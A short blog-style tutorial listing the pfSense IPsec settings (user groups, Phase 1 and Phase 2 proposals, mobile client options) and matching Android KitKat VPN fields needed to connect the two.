Getting your Android KitKat device to work with pfSense IPsec VPN server is a finicky process and the settings on both sides need to be exact.  Android only supports a small subset of common encryption schemes and this article will show you what settings to use.

pfSense IPSec settings

System -> User Manager -> Groups

Add a new group with the following template.

Group name: Mobile VPN
Description: IPSec VPN users
Assigned Privileges: User – VPN – IPsec xauth Dialin

System -> User Manager -> Users

Add a new user with the following template.

Username: <this will be this user’s VPN ID>
Password: <use a password generator>
Group memberships: Mobile VPN
IPSec Pre-Shared Key: <this will be the user’s VPN PSK>

Phase 1 Proposal (authentication)

Authentication method: Mutual PSK + Xauth
Negotiation mode: Aggressive
My identifier: Distinguished Name <not used>
Peer identifier: Distinguished Name <not used>
Pre-Shared Key: <not used, random data>
Policy Generation: Unique
Proposal Checking: Strict
Encryption algorithm: AES 128 bits
Hash algorithm: SHA1
DH key group: 2 (1024 bit)
Lifetime: 86400

Phase 2 Proposal (SA/Key exchange)

Mode: Tunnel IPv4
Local Network Type: Network
Local Network Address: 0.0.0.0/0
Local Network NAT Type: None
Protocol: ESP
Encryption Algorithms: AES 128 bits (uncheck all others)
Hash Algorithms: SHA1 (uncheck all others)
PFS key group: Off
Lifetime: 28800

Mobile Clients

IKE Extensions: <checked>
Virtual Address Pool: <checked, enter unused VPN network>

Pre-Shared Keys

This should be auto-populated from what we did earlier in the user settings page.

 

Android KitKat settings

Name: <whatever you want, it’s just a label>
Type: IPSec Xauth PSK
Server Address: <FQDN/IP of your server>
IPSec identifier: <username>
IPSec pre-shared key: <username’s pre-shared key>
Username: <username>
Password: <username’s password>

Pin It on Pinterest

Share This